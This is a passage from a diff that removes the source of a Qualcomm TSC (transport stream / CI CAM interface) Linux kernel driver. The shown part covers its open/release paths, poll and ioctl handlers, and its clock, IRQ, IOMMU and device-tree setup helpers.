-- if (!tsc_iommu_bypass) {
-- ret = iommu_attach_group(tsc_device->iommu_info.domain,
-- tsc_device->iommu_info.group);
-- if (ret != 0) {
-- pr_err("%s: iommu_attach_group failed\n", __func__);
-- goto err_iommu_attach;
-- }
-- }
--
-- /* Init TSC CI args */
-- spin_lock_init(&tsc_ci->spinlock);
-- init_waitqueue_head(&tsc_ci->poll_queue);
-- tsc_ci->transaction_state = BEFORE_TRANSACTION;
-- tsc_ci->data_busy = false;
-- tsc_device->card_power = false;
--
-- /*
-- * Init hw card status flag according to the pins' state.
-- * No need to protect from interrupt because the handler is not
-- * registred yet.
-- */
-- tsc_update_hw_card_status();
-- tsc_ci->card_status = tsc_device->hw_card_status;
--
-- /* If a card is already inserted - need to power up the card */
-- if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED) {
-- ret = tsc_card_power_up();
-- if (ret != 0)
-- pr_err("%s: card power-up failed\n", __func__);
-- else
-- tsc_device->card_power = true;
-- }
--
-- /* Enabling the TSC CI cam interrupts: EOT and Err */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- SET_BIT(CAM_IRQ_EOT_OFFS, ena_reg);
-- SET_BIT(CAM_IRQ_ERR_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- /* Registering the CAM cmd interrupt handler */
-- ret = request_irq(tsc_device->cam_cmd_irq, tsc_cam_cmd_irq_handler,
-- IRQF_SHARED, dev_name(&tsc_device->pdev->dev),
-- tsc_device);
-- if (ret) {
-- pr_err("%s: failed to request TSC IRQ %d : %d",
-- __func__, tsc_device->cam_cmd_irq, ret);
-- goto err_cam_irq;
-- }
--
-- /*
-- * Registering the card detect interrupt handler (this interrupt is
-- * enabled by default, right after this registration)
-- */
-- ret = request_threaded_irq(tsc_device->card_detection_irq,
-- NULL, tsc_card_detect_irq_thread_handler,
-- IRQF_ONESHOT | IRQF_TRIGGER_RISING,
-- dev_name(&tsc_device->pdev->dev), tsc_device);
-- if (ret) {
-- pr_err("%s: failed to request TSC IRQ %d : %d",
-- __func__, tsc_device->card_detection_irq, ret);
-- goto err_card_irq;
-- }
--
-- mutex_unlock(&tsc_device->ci_chdev.mutex);
--
-- return ret;
--
--err_card_irq:
-- free_irq(tsc_device->cam_cmd_irq, tsc_device);
--err_cam_irq:
-- if (!tsc_iommu_bypass)
-- iommu_detach_group(tsc_device->iommu_info.domain,
-- tsc_device->iommu_info.group);
--err_iommu_attach:
-- gpio_free(tsc_device->reset_cam_gpio);
--err_assert:
--err_gpio_req:
-- tsc_power_off_buff_mode_clocks();
--err_buff_clocks:
-- /* De-init all resources if it's the only device (checked inside) */
-- tsc_device_power_off();
--err_first_device:
-- tsc_device->num_ci_opened--;
-- mutex_unlock(&tsc_device->ci_chdev.mutex);
-- return ret;
--}
--
--/**
-- * tsc_mux_release() - Release and close the TSC Mux char device.
-- *
-- * @inode: The inode associated with the TSC Mux device.
-- * @flip: The file pointer associated with the TSC Mux device.
-- *
-- * Release all the resources allocated for the Mux device and unvote power
-- * resources.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_release(struct inode *inode, struct file *filp)
--{
-- struct tsc_mux_chdev *tsc_mux;
-- u32 ena_reg;
--
-- tsc_mux = filp->private_data;
-- if (!tsc_mux)
-- return -EINVAL;
--
-- mutex_lock(&tsc_mux->mutex);
--
-- tsc_mux_power_off_clocks();
--
-- /* Disable the TSIFs */
-- tsc_disable_tsifs();
-- /* Disabling rate mismatch interrupt */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- CLEAR_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- tsc_device_power_off();
--
-- tsc_device->num_mux_opened--;
-- mutex_unlock(&tsc_mux->mutex);
--
-- return 0;
--}
--
--/**
-- * tsc_ci_release() - Release and close the TSC CI char device.
-- *
-- * @inode: The inode associated with the TSC CI device.
-- * @flip: The file pointer associated with the TSC CI device.
-- *
-- * Release all the resources allocated for the CI device and unvote power
-- * resources.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_ci_release(struct inode *inode, struct file *filp)
--{
-- struct tsc_ci_chdev *tsc_ci;
-- u32 ena_reg;
-- int ret;
--
-- tsc_ci = filp->private_data;
-- if (!tsc_ci)
-- return -EINVAL;
--
-- mutex_lock(&tsc_ci->mutex);
--
-- /* If in the middle of a data transaction- wake-up completion */
-- if (tsc_ci->data_busy) {
-- /* Closing the device is similar in behavior to card removal */
-- tsc_ci->transaction_state = TRANSACTION_CARD_REMOVED;
-- mutex_unlock(&tsc_ci->mutex);
-- complete_all(&tsc_ci->transaction_complete);
-- wait_for_completion(&tsc_ci->transaction_finish);
-- mutex_lock(&tsc_ci->mutex);
-- }
--
-- /* clearing EOT and ERR interrupts */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- CLEAR_BIT(CAM_IRQ_EOT_OFFS, ena_reg);
-- CLEAR_BIT(CAM_IRQ_ERR_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- /* Cancel the interrupt handlers registration */
-- free_irq(tsc_device->card_detection_irq, tsc_device);
-- free_irq(tsc_device->cam_cmd_irq, tsc_device);
--
-- /* power down the card interface if it's currently powered up */
-- if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED &&
-- tsc_device->card_power) {
-- ret = tsc_card_power_down();
-- if (ret != 0)
-- pr_err("%s: card power-down failed\n", __func__);
-- }
--
-- if (!tsc_iommu_bypass)
-- iommu_detach_group(tsc_device->iommu_info.domain,
-- tsc_device->iommu_info.group);
--
-- gpio_free(tsc_device->reset_cam_gpio);
--
-- tsc_power_off_buff_mode_clocks();
-- tsc_device_power_off();
--
-- tsc_device->num_ci_opened--;
-- mutex_unlock(&tsc_ci->mutex);
--
-- return 0;
--}
--
--/**
-- * tsc_mux_poll() - Perform polling on a designated wait-queue.
-- *
-- * @flip: The file pointer associated with the TSC Mux device.
-- * @p: The poll-table struct of the kernel.
-- *
-- * Add the TSC Mux wait-queue to the poll-table. Poll until a rate mismatch
-- * interrupt is received.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static unsigned int tsc_mux_poll(struct file *filp, struct poll_table_struct *p)
--{
-- unsigned long flags;
-- unsigned int mask = 0;
-- struct tsc_mux_chdev *tsc_mux;
--
-- tsc_mux = filp->private_data;
-- if (!tsc_mux)
-- return -EINVAL;
--
-- /* register the wait queue for rate mismatch interrupt */
-- poll_wait(filp, &tsc_mux->poll_queue, p);
--
-- /* Setting the mask upon rate mismatch irq and clearing the flag */
-- spin_lock_irqsave(&tsc_mux->spinlock, flags);
-- if (tsc_mux->rate_interrupt) {
-- mask = POLLPRI;
-- tsc_mux->rate_interrupt = false;
-- }
-- spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
--
-- return mask;
--}
--
--/**
-- * tsc_ci_poll() - Perform polling on a designated wait-queue.
-- *
-- * @flip: The file pointer associated with the TSC CI device.
-- * @p: The poll-table struct of the kernel.
-- *
-- * Add the TSC Mux wait-queue to the poll-table. Poll until a card detection
-- * interrupt is received.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static unsigned int tsc_ci_poll(struct file *filp, struct poll_table_struct *p)
--{
-- unsigned int mask = 0;
--
-- struct tsc_ci_chdev *tsc_ci = filp->private_data;
-- if (!tsc_ci)
-- return -EINVAL;
--
-- /* Register the wait queue for card detection interrupt */
-- poll_wait(filp, &tsc_ci->poll_queue, p);
--
-- /* Setting the mask upon card detect irq and update ci card state */
-- if (mutex_lock_interruptible(&tsc_ci->mutex))
-- return -ERESTARTSYS;
-- if (tsc_ci->card_status != tsc_device->hw_card_status) {
-- mask = POLLPRI;
-- tsc_ci->card_status = tsc_device->hw_card_status;
-- }
-- mutex_unlock(&tsc_ci->mutex);
--
-- return mask;
--}
--
--/**
-- * tsc_mux_ioctl() - Handle IOCTLs sent from user-space application.
-- *
-- * @flip: The file pointer associated with the TSC Mux device.
-- * @cmd: The IOCTL code sent
-- * @arg: The IOCTL argument (if the IOCTL receives an argument)
-- *
-- * Verify the validity of the IOCTL sent and handle it by updating the
-- * appropriate register or calling a function that handle the IOCTL operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static long tsc_mux_ioctl(struct file *filp,
-- unsigned int cmd,
-- unsigned long arg)
--{
-- int ret = 0;
-- struct tsc_mux_chdev *tsc_mux;
-- struct tsc_route tsc_route;
-- struct tsc_tsif_params tsif_params;
--
-- tsc_mux = filp->private_data;
-- if (!tsc_mux)
-- return -EINVAL;
--
-- if (mutex_lock_interruptible(&tsc_mux->mutex))
-- return -ERESTARTSYS;
--
-- switch (cmd) {
-- case TSC_CONFIG_ROUTE:
-- if (!arg || copy_from_user(&tsc_route, (void *)arg,
-- sizeof(struct tsc_route))) {
-- ret = -EFAULT;
-- goto err;
-- }
-- ret = tsc_route_mux(tsc_mux, tsc_route.source, tsc_route.dest);
-- break;
-- case TSC_ENABLE_INPUT:
-- ret = tsc_enable_disable_tsif(tsc_mux, arg, TSIF_INPUT_ENABLE);
-- break;
-- case TSC_DISABLE_INPUT:
-- ret = tsc_enable_disable_tsif(tsc_mux, arg, TSIF_INPUT_DISABLE);
-- break;
-- case TSC_SET_TSIF_CONFIG:
-- if (!arg || copy_from_user(&tsif_params, (void *)arg,
-- sizeof(struct tsc_tsif_params))) {
-- ret = -EFAULT;
-- goto err;
-- }
-- ret = tsc_config_tsif(tsc_mux, &tsif_params);
-- break;
-- case TSC_CLEAR_RATE_MISMATCH_IRQ:
-- tsc_enable_rate_irq(tsc_mux);
-- break;
-- case TSC_CICAM_SET_CLOCK:
-- ret = tsc_set_cicam_clk(arg);
-- break;
-- default:
-- ret = -EINVAL;
-- pr_err("%s: Unknown ioctl %i", __func__, cmd);
-- }
--
--err:
-- mutex_unlock(&tsc_mux->mutex);
-- return ret;
--}
--
--/**
-- * tsc_ci_ioctl() - Handle IOCTLs sent from user-space application.
-- *
-- * @flip: The file pointer associated with the TSC CI device.
-- * @cmd: The IOCTL code sent
-- * @arg: The IOCTL argument (if the IOCTL receives an argument)
-- *
-- * Verify the validity of the IOCTL sent and handle it by updating the
-- * appropriate register or calling a function that handle the IOCTL operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static long tsc_ci_ioctl(struct file *filp,
-- unsigned int cmd,
-- unsigned long arg)
--{
-- int ret = 0;
-- struct tsc_ci_chdev *tsc_ci;
-- unsigned long flags;
--
-- tsc_ci = filp->private_data;
-- if (!tsc_ci)
-- return -EINVAL;
--
-- if (mutex_lock_interruptible(&tsc_ci->mutex))
-- return -ERESTARTSYS;
--
-- switch (cmd) {
--
-- case TSC_CAM_RESET:
-- ret = tsc_reset_cam();
-- break;
-- case TSC_CICAM_PERSONALITY_CHANGE:
-- ret = tsc_personality_change(arg);
-- break;
-- case TSC_GET_CARD_STATUS:
-- spin_lock_irqsave(&tsc_ci->spinlock, flags);
-- tsc_ci->card_status = tsc_device->hw_card_status;
-- ret = __put_user(tsc_ci->card_status,
-- (enum tsc_card_status __user *)arg);
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
-- break;
-- case TSC_READ_CAM_MEMORY:
-- ret = tsc_data_transaction(tsc_ci, MEMORY_TRANSACTION,
-- READ_TRANSACTION, SINGLE_BYTE_MODE, arg);
-- break;
-- case TSC_WRITE_CAM_MEMORY:
-- ret = tsc_data_transaction(tsc_ci, MEMORY_TRANSACTION,
-- WRITE_TRANSACTION, SINGLE_BYTE_MODE, arg);
-- break;
-- case TSC_READ_CAM_IO:
-- ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
-- READ_TRANSACTION, SINGLE_BYTE_MODE, arg);
-- break;
-- case TSC_WRITE_CAM_IO:
-- ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
-- WRITE_TRANSACTION, SINGLE_BYTE_MODE, arg);
-- break;
-- case TSC_READ_CAM_BUFFER:
-- ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
-- READ_TRANSACTION, BUFFER_MODE, arg);
-- break;
-- case TSC_WRITE_CAM_BUFFER:
-- ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
-- WRITE_TRANSACTION, BUFFER_MODE, arg);
-- break;
-- default:
-- ret = -EINVAL;
-- pr_err("%s: Unknown ioctl %i\n", __func__, cmd);
-- }
--
-- mutex_unlock(&tsc_ci->mutex);
-- return ret;
--}
--
--/************************** Probe helper-functions **************************/
--/**
-- * tsc_init_char_driver() - Initialize a character driver.
-- *
-- * @pcdev: A pointer to the cdev structure to initialize.
-- * @pfops: A pointer to the file_operations for this device.
-- * @device_number: A pointer that will store the device number.
-- * @device: A pointer that will store the new device upon success.
-- * @name: A string for the device's name.
-- *
-- * Create a new character device driver inside the TSC class. The new device
-- * is created under "/dev/0".
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_init_char_driver(struct cdev *pcdev,
-- const struct file_operations *pfops,
-- dev_t *pdevice_number,
-- struct device *pdevice,
-- const char *name)
--{
-- int ret = 0;
--
-- /* Allocate device number for the char device driver */
-- ret = alloc_chrdev_region(pdevice_number, 0, 1, name);
-- if (ret) {
-- pr_err("%s: alloc_chrdev_region failed: %d\n", name, ret);
-- goto err_devrgn;
-- }
--
-- /* initializing the char device structures with file operations */
-- cdev_init(pcdev, pfops);
-- pcdev->owner = THIS_MODULE;
--
-- /* adding the char device structures to the VFS */
-- ret = cdev_add(pcdev, *pdevice_number, 1);
-- if (ret != 0) {
-- pr_err("%s%d: cdev_add failed\n", name, MINOR(*pdevice_number));
-- goto err_cdev_add;
-- }
--
-- /* create the char devices under "/dev/" and register them to sysfs */
-- pdevice = device_create(tsc_class, NULL, pcdev->dev, NULL, "%s%d", name,
-- MINOR(*pdevice_number));
-- if (IS_ERR(pdevice)) {
-- pr_err("%s%d device_create failed\n", name,
-- MINOR(*pdevice_number));
-- ret = PTR_ERR(pdevice); /* PTR_ERR return -ENOMEM */
-- goto err_device_create;
-- }
--
-- return ret;
--
--err_device_create:
-- cdev_del(pcdev);
--err_cdev_add:
-- unregister_chrdev_region(*pdevice_number, 1);
--err_devrgn:
-- return ret;
--}
--
--/**
-- * tsc_get_pinctrl() - Get the TSC pinctrl definitions.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Get the pinctrl states' handles from the device tree. The function doesn't
-- * enforce wrong pinctrl definitions, i.e. it's the client's responsibility to
-- * define all the necessary states for the board being used.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_pinctrl(struct platform_device *pdev)
--{
-- struct pinctrl *pinctrl;
--
-- pinctrl = devm_pinctrl_get(&pdev->dev);
-- if (IS_ERR(pinctrl)) {
-- pr_err("%s: Unable to get pinctrl handle\n", __func__);
-- return -EINVAL;
-- }
-- tsc_device->pinctrl_info.pinctrl = pinctrl;
--
-- /* get all the states handles */
-- tsc_device->pinctrl_info.disable =
-- pinctrl_lookup_state(pinctrl, "disable");
-- tsc_device->pinctrl_info.ts0 =
-- pinctrl_lookup_state(pinctrl, "ts-in-0");
-- tsc_device->pinctrl_info.ts1 =
-- pinctrl_lookup_state(pinctrl, "ts-in-1");
-- tsc_device->pinctrl_info.dual_ts =
-- pinctrl_lookup_state(pinctrl, "dual-ts");
-- tsc_device->pinctrl_info.pc_card =
-- pinctrl_lookup_state(pinctrl, "pc-card");
-- tsc_device->pinctrl_info.ci_card =
-- pinctrl_lookup_state(pinctrl, "ci-card");
-- tsc_device->pinctrl_info.ci_plus =
-- pinctrl_lookup_state(pinctrl, "ci-plus");
-- tsc_device->pinctrl_info.ts0_pc_card =
-- pinctrl_lookup_state(pinctrl, "ts-in-0-pc-card");
-- tsc_device->pinctrl_info.ts0_ci_card =
-- pinctrl_lookup_state(pinctrl, "ts-in-0-ci-card");
-- tsc_device->pinctrl_info.ts0_ci_plus =
-- pinctrl_lookup_state(pinctrl, "ts-in-0-ci-plus");
-- tsc_device->pinctrl_info.ts1_pc_card =
-- pinctrl_lookup_state(pinctrl, "ts-in-1-pc-card");
-- tsc_device->pinctrl_info.ts1_ci_card =
-- pinctrl_lookup_state(pinctrl, "ts-in-1-ci-card");
-- tsc_device->pinctrl_info.ts1_ci_plus =
-- pinctrl_lookup_state(pinctrl, "ts-in-1-ci-plus");
-- tsc_device->pinctrl_info.dual_ts_pc_card =
-- pinctrl_lookup_state(pinctrl, "dual-ts-pc-card");
-- tsc_device->pinctrl_info.dual_ts_ci_card =
-- pinctrl_lookup_state(pinctrl, "dual-ts-ci-card");
-- tsc_device->pinctrl_info.dual_ts_ci_plus =
-- pinctrl_lookup_state(pinctrl, "dual-ts-ci-plus");
--
-- if (IS_ERR(tsc_device->pinctrl_info.disable)) {
-- pr_err("%s: Unable to get pinctrl disable state handle\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- /* Basic checks to inquire what pinctrl states are available */
-- if (IS_ERR(tsc_device->pinctrl_info.ts0))
-- tsc_device->pinctrl_info.is_ts0 = false;
-- else
-- tsc_device->pinctrl_info.is_ts0 = true;
--
-- if (IS_ERR(tsc_device->pinctrl_info.ts1))
-- tsc_device->pinctrl_info.is_ts1 = false;
-- else
-- tsc_device->pinctrl_info.is_ts1 = true;
--
-- if (IS_ERR(tsc_device->pinctrl_info.pc_card) ||
-- IS_ERR(tsc_device->pinctrl_info.ci_card) ||
-- IS_ERR(tsc_device->pinctrl_info.ci_plus))
-- tsc_device->pinctrl_info.is_pcmcia = false;
-- else
-- tsc_device->pinctrl_info.is_pcmcia = true;
--
-- return 0;
--}
--
--/**
-- * tsc_get_regulator_bus() - Get the TSC regulator and register the bus client.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_regulator_bus(struct platform_device *pdev)
--{
-- struct msm_bus_scale_pdata *tsc_bus_pdata = NULL;
--
-- /* Reading the GDSC info */
-- tsc_device->gdsc = devm_regulator_get(&pdev->dev, "vdd");
-- if (IS_ERR(tsc_device->gdsc)) {
-- dev_err(&pdev->dev, "%s: Failed to get vdd power regulator\n",
-- __func__);
-- return PTR_ERR(tsc_device->gdsc);
-- }
--
-- /* Reading the bus platform data */
-- tsc_bus_pdata = msm_bus_cl_get_pdata(pdev);
-- if (tsc_bus_pdata == NULL) {
-- dev_err(&pdev->dev, "%s: Could not find the bus property. Continue anyway...\n",
-- __func__);
-- }
--
-- /* Register the bus client */
-- if (tsc_bus_pdata) {
-- tsc_device->bus_client =
-- msm_bus_scale_register_client(tsc_bus_pdata);
-- if (!tsc_device->bus_client) {
-- dev_err(&pdev->dev, "%s: Unable to register bus client\n",
-- __func__);
-- goto err;
-- }
-- }
--
-- return 0;
--err:
-- devm_regulator_put(tsc_device->gdsc);
-- return -EINVAL;
--}
--
--/**
-- * tsc_get_irqs() - Get the TSC IRQ numbers and map the cam irq.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Read the irq numbers from the platform device information.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_irqs(struct platform_device *pdev)
--{
-- int irq;
--
-- irq = platform_get_irq_byname(pdev, "cam-cmd");
-- if (irq > 0) {
-- tsc_device->cam_cmd_irq = irq;
-- } else {
-- dev_err(&pdev->dev, "%s: Failed to get CAM_CMD IRQ = %d",
-- __func__, irq);
-- goto err;
-- }
--
-- irq = platform_get_irq_byname(pdev, "card-detect");
-- if (irq > 0) {
-- tsc_device->card_detection_irq = irq;
-- } else {
-- dev_err(&pdev->dev, "%s: Failed to get CARD_DETECT IRQ = %d",
-- __func__, irq);
-- goto err;
-- }
--
-- return 0;
--err:
-- tsc_device->cam_cmd_irq = 0;
-- tsc_device->card_detection_irq = 0;
--
-- return -EINVAL;
--}
--
--/**
-- * tsc_map_io_memory() - Map memory resources to kernel space.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_map_io_memory(struct platform_device *pdev)
--{
-- struct resource *registers_mem;
--
-- /* Reading memory resources */
-- registers_mem = platform_get_resource_byname(pdev, IORESOURCE_MEM,
-- "tsc-base");
-- if (!registers_mem) {
-- dev_err(&pdev->dev, "%s: Missing tsc-base MEM resource",
-- __func__);
-- return -EINVAL;
-- }
--
-- tsc_device->base = ioremap(registers_mem->start,
-- resource_size(registers_mem));
-- if (!tsc_device->base) {
-- dev_err(&pdev->dev, "%s: ioremap failed", __func__);
-- return -ENXIO;
-- }
--
-- return 0;
--}
--
--/**
-- * tsc_clocks_put() - Put the clocks
-- */
--static void tsc_clocks_put(void)
--{
-- if (tsc_device->ahb_clk)
-- clk_put(tsc_device->ahb_clk);
-- if (tsc_device->ci_clk)
-- clk_put(tsc_device->ci_clk);
-- if (tsc_device->ser_clk)
-- clk_put(tsc_device->ser_clk);
-- if (tsc_device->par_clk)
-- clk_put(tsc_device->par_clk);
-- if (tsc_device->cicam_ts_clk)
-- clk_put(tsc_device->cicam_ts_clk);
-- if (tsc_device->tspp2_core_clk)
-- clk_put(tsc_device->tspp2_core_clk);
-- if (tsc_device->vbif_tspp2_clk)
-- clk_put(tsc_device->vbif_tspp2_clk);
-- if (tsc_device->vbif_ahb_clk)
-- clk_put(tsc_device->vbif_ahb_clk);
-- if (tsc_device->vbif_axi_clk)
-- clk_put(tsc_device->vbif_axi_clk);
--
-- tsc_device->ahb_clk = NULL;
-- tsc_device->ci_clk = NULL;
-- tsc_device->ser_clk = NULL;
-- tsc_device->par_clk = NULL;
-- tsc_device->cicam_ts_clk = NULL;
-- tsc_device->tspp2_core_clk = NULL;
-- tsc_device->vbif_tspp2_clk = NULL;
-- tsc_device->vbif_ahb_clk = NULL;
-- tsc_device->vbif_axi_clk = NULL;
--}
--
--/**
-- * tsc_clocks_get() - Get the TSC clocks
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_clocks_get(struct platform_device *pdev)
--{
-- int ret = 0;
--
-- tsc_device->ahb_clk = clk_get(&pdev->dev, "bcc_tsc_ahb_clk");
-- if (IS_ERR(tsc_device->ahb_clk)) {
-- pr_err("%s: Failed to get bcc_tsc_ahb_clk\n", __func__);
-- ret = PTR_ERR(tsc_device->ahb_clk);
-- goto ahb_err;
-- }
--
-- tsc_device->ci_clk = clk_get(&pdev->dev, "bcc_tsc_ci_clk");
-- if (IS_ERR(tsc_device->ci_clk)) {
-- pr_err("%s: Failed to get bcc_tsc_ci_clk\n", __func__);
-- ret = PTR_ERR(tsc_device->ci_clk);
-- goto ci_err;
-- }
--
-- tsc_device->ser_clk = clk_get(&pdev->dev, "bcc_tsc_ser_clk");
-- if (IS_ERR(tsc_device->ser_clk)) {
-- pr_err("%s: Failed to get bcc_tsc_ser_clk\n", __func__);
-- ret = PTR_ERR(tsc_device->ser_clk);
-- goto ser_err;
-- }
--
-- tsc_device->par_clk = clk_get(&pdev->dev, "bcc_tsc_par_clk");
-- if (IS_ERR(tsc_device->par_clk)) {
-- pr_err("%s: Failed to get bcc_tsc_par_clk", __func__);
-- ret = PTR_ERR(tsc_device->par_clk);
-- goto par_err;
-- }
--
-- tsc_device->cicam_ts_clk = clk_get(&pdev->dev, "bcc_tsc_cicam_ts_clk");
-- if (IS_ERR(tsc_device->cicam_ts_clk)) {
-- pr_err("%s: Failed to get bcc_tsc_cicam_ts_clk", __func__);
-- ret = PTR_ERR(tsc_device->cicam_ts_clk);
-- goto cicam_err;
-- }
--
-- tsc_device->tspp2_core_clk = clk_get(&pdev->dev, "bcc_tspp2_core_clk");
-- if (IS_ERR(tsc_device->tspp2_core_clk)) {
-- pr_err("%s: Failed to get bcc_tspp2_core_clk", __func__);
-- ret = PTR_ERR(tsc_device->tspp2_core_clk);
-- goto tspp2_err;
-- }
--
-- tsc_device->vbif_tspp2_clk = clk_get(&pdev->dev, "bcc_vbif_tspp2_clk");
-- if (IS_ERR(tsc_device->vbif_tspp2_clk)) {
-- pr_err("%s: Failed to get bcc_vbif_tspp2_clk", __func__);
-- ret = PTR_ERR(tsc_device->vbif_tspp2_clk);
-- goto vbif_tspp2_err;
-- }
--
-- tsc_device->vbif_ahb_clk = clk_get(&pdev->dev, "iface_vbif_clk");
-- if (IS_ERR(tsc_device->vbif_ahb_clk)) {
-- pr_err("%s: Failed to get bcc_vbif_ahb_clk", __func__);
-- ret = PTR_ERR(tsc_device->vbif_ahb_clk);
-- goto vbif_ahb_err;
-- }
--
-- tsc_device->vbif_axi_clk = clk_get(&pdev->dev, "vbif_core_clk");
-- if (IS_ERR(tsc_device->vbif_axi_clk)) {
-- pr_err("%s: Failed to get bcc_vbif_axi_clk", __func__);
-- ret = PTR_ERR(tsc_device->vbif_axi_clk);
-- goto vbif_axi_err;
-- }
--
-- return ret;
--
--vbif_axi_err:
-- tsc_device->vbif_axi_clk = NULL;
-- clk_put(tsc_device->vbif_ahb_clk);
--vbif_ahb_err:
-- tsc_device->vbif_ahb_clk = NULL;
-- clk_put(tsc_device->vbif_tspp2_clk);
--vbif_tspp2_err:
-- tsc_device->vbif_tspp2_clk = NULL;
-- clk_put(tsc_device->tspp2_core_clk);
--tspp2_err:
-- tsc_device->tspp2_core_clk = NULL;
-- clk_put(tsc_device->cicam_ts_clk);
--cicam_err:
-- tsc_device->cicam_ts_clk = NULL;
-- clk_put(tsc_device->par_clk);
--par_err:
-- tsc_device->par_clk = NULL;
-- clk_put(tsc_device->ser_clk);
--ser_err:
-- tsc_device->ser_clk = NULL;
-- clk_put(tsc_device->ci_clk);
--ci_err:
-- tsc_device->ci_clk = NULL;
-- clk_put(tsc_device->ahb_clk);
--ahb_err:
-- tsc_device->ahb_clk = NULL;
-- return ret;
--}
--
--/**
-- * tsc_free_iommu_info() - Free IOMMU information.
-- */
--static void tsc_free_iommu_info(void)
--{
-- if (tsc_device->iommu_info.group) {
-- iommu_group_put(tsc_device->iommu_info.group);
-- tsc_device->iommu_info.group = NULL;
-- }
--
-- if (tsc_device->iommu_info.ion_client) {
-- ion_client_destroy(tsc_device->iommu_info.ion_client);
-- tsc_device->iommu_info.ion_client = NULL;
-- }
--
-- tsc_device->iommu_info.domain = NULL;
-- tsc_device->iommu_info.domain_num = -1;
-- tsc_device->iommu_info.partition_num = -1;
--}
--
--/**
-- * tsc_get_iommu_info() - Get IOMMU information.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_iommu_info(struct platform_device *pdev)
--{
-- int ret = 0;
--
-- /* Create a new ION client used by tsc ci to allocate memory */
-- tsc_device->iommu_info.ion_client = msm_ion_client_create("tsc_client");
-- if (IS_ERR_OR_NULL(tsc_device->iommu_info.ion_client)) {
-- pr_err("%s: error in ion_client_create", __func__);
-- ret = PTR_ERR(tsc_device->iommu_info.ion_client);
-- if (!ret)
-- ret = -ENOMEM;
-- tsc_device->iommu_info.ion_client = NULL;
-- goto err_client;
-- }
--
-- /* Find the iommu group by the name obtained from the device tree */
-- tsc_device->iommu_info.group =
-- iommu_group_find(tsc_device->iommu_info.iommu_group_name);
-- if (!tsc_device->iommu_info.group) {
-- pr_err("%s: error in iommu_group_find", __func__);
-- ret = -EINVAL;
-- goto err_group;
-- }
--
-- /* Get the domain associated with the iommu group */
-- tsc_device->iommu_info.domain =
-- iommu_group_get_iommudata(tsc_device->iommu_info.group);
-- if (IS_ERR_OR_NULL(tsc_device->iommu_info.domain)) {
-- pr_err("%s: iommu_group_get_iommudata failed", __func__);
-- ret = -EINVAL;
-- goto err_domain;
-- }
--
-- /* Get the domain number */
-- tsc_device->iommu_info.domain_num =
-- msm_find_domain_no(tsc_device->iommu_info.domain);
--
-- return ret;
--
--err_domain:
-- iommu_group_put(tsc_device->iommu_info.group);
-- tsc_device->iommu_info.group = NULL;
--err_group:
-- ion_client_destroy(tsc_device->iommu_info.ion_client);
-- tsc_device->iommu_info.ion_client = NULL;
--err_client:
-- return ret;
--}
--
--/**
-- * tsc_parse_dt() - Parse device-tree data and save it.
-- *
-- * @pdev: A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_parse_dt(struct platform_device *pdev)
--{
-- struct device_node *node = pdev->dev.of_node;
-- struct device_node *iommu_pnode;
-- int ret;
--
-- /* Check that power regulator property exist */
-- if (!of_get_property(node, "vdd-supply", NULL)) {
-- dev_err(&pdev->dev, "%s: Could not find vdd-supply property\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- /* Reading IOMMU group label by obtaining the group's phandle */
-- iommu_pnode = of_parse_phandle(node, "qcom,iommu-group", 0);
-- if (!iommu_pnode) {
-- dev_err(&pdev->dev, "%s: Couldn't find iommu-group property\n",
-- __func__);
-- return -EINVAL;
-- }
-- ret = of_property_read_string(iommu_pnode, "label",
-- &tsc_device->iommu_info.iommu_group_name);
-- of_node_put(iommu_pnode);
-- if (ret) {
-- dev_err(&pdev->dev, "%s: Couldn't find label property of the IOMMU group, err=%d\n",
-- __func__, ret);
-- return -EINVAL;
-- }
--
-- /* Reading IOMMU partition */
-- ret = of_property_read_u32(node, "qcom,iommu-partition",
-- &tsc_device->iommu_info.partition_num);
-- if (ret) {
-- dev_err(&pdev->dev, "%s: Couldn't find iommu-partition property, err=%d\n",
-- __func__, ret);
-- return -EINVAL;
-- }
--
-- /* Reading reset cam gpio */
-- tsc_device->reset_cam_gpio = of_get_named_gpio(node,
-- "qcom,tsc-reset-cam-gpio", 0);
-- if (tsc_device->reset_cam_gpio < 0) {
